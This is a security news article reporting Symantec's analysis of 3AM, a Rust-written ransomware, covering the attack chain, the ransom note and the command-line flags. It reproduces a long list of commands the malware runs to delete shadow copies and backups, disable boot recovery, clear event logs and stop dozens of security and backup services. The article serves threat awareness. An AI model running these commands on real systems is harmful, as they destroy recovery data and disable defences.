Thursday, April 24, 2025
HomeCyber Security News3AM Ransomware Attack - Stop Services & Delete Shadow Copies Before Encrypting

3AM Ransomware Attack – Stop Services & Delete Shadow Copies Before Encrypting

Published on

SIEM as a Service

Follow Us on Google News

Ransomware is a universal threat to enterprises, targeting anyone handling sensitive data when profit potential is high.

A new ransomware named 3AM has surfaced and is used in a limited manner. Symantec’s Threat Hunter Team witnessed it in a single attack, replacing LockBit when blocked.

3AM is a Rust-written ransomware that is completely unexplored that ceases services, encrypts files and tries to delete VSS copies. However, besides this, its connections to cybercrime groups remain uncertain.

- Advertisement - Google News

Attack overview

The threat actor’s initial actions included running ‘gpresult’ to extract policy settings, deploying Cobalt Strike components, and attempting privilege escalation with PsExec.

The attackers conducted reconnaissance with the following commands for lateral movement opportunities:-

They established persistence by adding a new user and exfiltrated files using Wput to their FTP server. The attackers initially tried LockBit, but after it was blocked, they turned to 3AM. 

Their use of 3AM was partially successful, as it only infected three out of the organization’s machines, with two of them successfully blocking it.

Ransom note

3AM gets its name from the ‘.threeamtime’ file extension it adds to encrypted files, as referenced in the ransom note.

ransom note
3AM Ransom Note (Source – Symantec)

Threat researcher Ygor Maximo has recently identified a leaked website belonging to the 3AM ransomware group. The website currently lists six victims who have fallen prey to the group’s notorious activities. This discovery highlights the ever-increasing threat posed by ransomware attacks and serves as a reminder of the importance of robust cybersecurity measures to protect businesses and individuals alike.

This Rust-based ransomware recognizes the following command-line parameters since it’s a 64-bit executable:-

  • “-k”
  • “-p”
  • “-h”
  • “-m”
  • “-s”

The malware tries to run the following commands after its execution, and it mainly targets the security and backup software:-

  • “netsh.exe” advfirewall firewall set rule “group=”Network Discovery”” new enable=Yes
  • “wbadmin.exe” delete systemstatebackup -keepVersions:0 -quiet
  • “wbadmin.exe” DELETE SYSTEMSTATEBACKUP
  • “wbadmin.exe” DELETE SYSTEMSTATEBACKUP -deleteOldest
  • “bcdedit.exe” /set {default} recoveryenabled No
  • “bcdedit.exe” /set {default} bootstatuspolicy ignoreallfailures
  • “wmic.exe” SHADOWCOPY DELETE /nointeractive
  • “cmd.exe” /c wevtutil cl security
  • “cmd.exe” /c wevtutil cl system
  • “cmd.exe” /c wevtutil cl application
  • “net” stop /y vmcomp
  • “net” stop /y vmwp
  • “net” stop /y veeam
  • “net” stop /y Back
  • “net” stop /y xchange
  • “net” stop /y backup
  • “net” stop /y Backup
  • “net” stop /y acronis
  • “net” stop /y AcronisAgent
  • “net” stop /y AcrSch2Svc
  • “net” stop /y sql
  • “net” stop /y Enterprise
  • “net” stop /y Veeam
  • “net” stop /y VeeamTransportSvc
  • “net” stop /y VeeamNFSSvc
  • “net” stop /y AcrSch
  • “net” stop /y bedbg
  • “net” stop /y DCAgent
  • “net” stop /y EPSecurity
  • “net” stop /y EPUpdate
  • “net” stop /y Eraser
  • “net” stop /y EsgShKernel
  • “net” stop /y FA_Scheduler
  • “net” stop /y IISAdmin
  • “net” stop /y IMAP4
  • “net” stop /y MBAM
  • “net” stop /y Endpoint
  • “net” stop /y Afee
  • “net” stop /y McShield
  • “net” stop /y task
  • “net” stop /y mfemms
  • “net” stop /y mfevtp
  • “net” stop /y mms
  • “net” stop /y MsDts
  • “net” stop /y Exchange
  • “net” stop /y ntrt
  • “net” stop /y PDVF
  • “net” stop /y POP3
  • “net” stop /y Report
  • “net” stop /y RESvc
  • “net” stop /y Monitor
  • “net” stop /y Smcinst
  • “net” stop /y SmcService
  • “net” stop /y SMTP
  • “net” stop /y SNAC
  • “net” stop /y swi_
  • “net” stop /y CCSF
  • “net” stop /y ccEvtMgr
  • “net” stop /y ccSetMgr
  • “net” stop /y TrueKey
  • “net” stop /y tmlisten
  • “net” stop /y UIODetect
  • “net” stop /y W3S
  • “net” stop /y WRSVC
  • “net” stop /y NetMsmq
  • “net” stop /y ekrn
  • “net” stop /y EhttpSrv
  • “net” stop /y ESHASRV
  • “net” stop /y AVP
  • “net” stop /y klnagent
  • “net” stop /y wbengine
  • “net” stop /y KAVF
  • “net” stop /y mfefire
  • “net” stop /y svc$
  • “net” stop /y memtas
  • “net” stop /y mepocs
  • “net” stop /y GxVss
  • “net” stop /y GxCVD
  • “net” stop /y GxBlr
  • “net” stop /y GxFWD
  • “net” stop /y GxCIMgr
  • “net” stop /y BackupExecVSSProvider
  • “net” stop /y BackupExecManagementService
  • “net” stop /y BackupExecJobEngine
  • “net” stop /y BackupExecDiveciMediaService
  • “net” stop /y BackupExecAgentBrowser
  • “net” stop /y BackupExecAgentAccelerator
  • “net” stop /y vss
  • “net” stop /y BacupExecRPCService
  • “net” stop /y CASAD2WebSvc
  • “net” stop /y CAARCUpdateSvc
  • “net” stop /y YooBackup
  • “net” stop /y YooIT

The ransomware scans encrypts matching files, deletes originals, and drops a ‘RECOVER-FILES.txt’ ransom note in each folder. Besides this, the encrypted files have a ‘0x666’ marker followed by ransomware data.

Ransomware affiliates act more independently, with some deploying multiple ransomware strains in one attack. While many new ransomware families fade quickly, 3 AM’s use as a LockBit affiliate fallback hints at potential future relevance for attackers.

IOCs

3AM Ransomware
IOCs (Source – Symantec)

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Verizon DBIR Report: Small Businesses Identified as Key Targets in Ransomware Attacks

Verizon Business's 2025 Data Breach Investigations Report (DBIR), released on April 24, 2025, paints...

Lazarus APT Targets Organizations by Exploiting One-Day Vulnerabilities

A recent cyber espionage campaign by the notorious Lazarus Advanced Persistent Threat (APT) group,...

ToyMaker Hackers Compromise Numerous Hosts via SSH and File Transfer Tools

In a alarming cybersecurity breach uncovered by Cisco Talos in 2023, a critical infrastructure...

Threat Actors Exploiting Unsecured Kubernetes Clusters for Crypto Mining

In a startling revelation from Microsoft Threat Intelligence, threat actors are increasingly targeting unsecured...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Verizon DBIR Report: Small Businesses Identified as Key Targets in Ransomware Attacks

Verizon Business's 2025 Data Breach Investigations Report (DBIR), released on April 24, 2025, paints...

Lazarus APT Targets Organizations by Exploiting One-Day Vulnerabilities

A recent cyber espionage campaign by the notorious Lazarus Advanced Persistent Threat (APT) group,...

ToyMaker Hackers Compromise Numerous Hosts via SSH and File Transfer Tools

In a alarming cybersecurity breach uncovered by Cisco Talos in 2023, a critical infrastructure...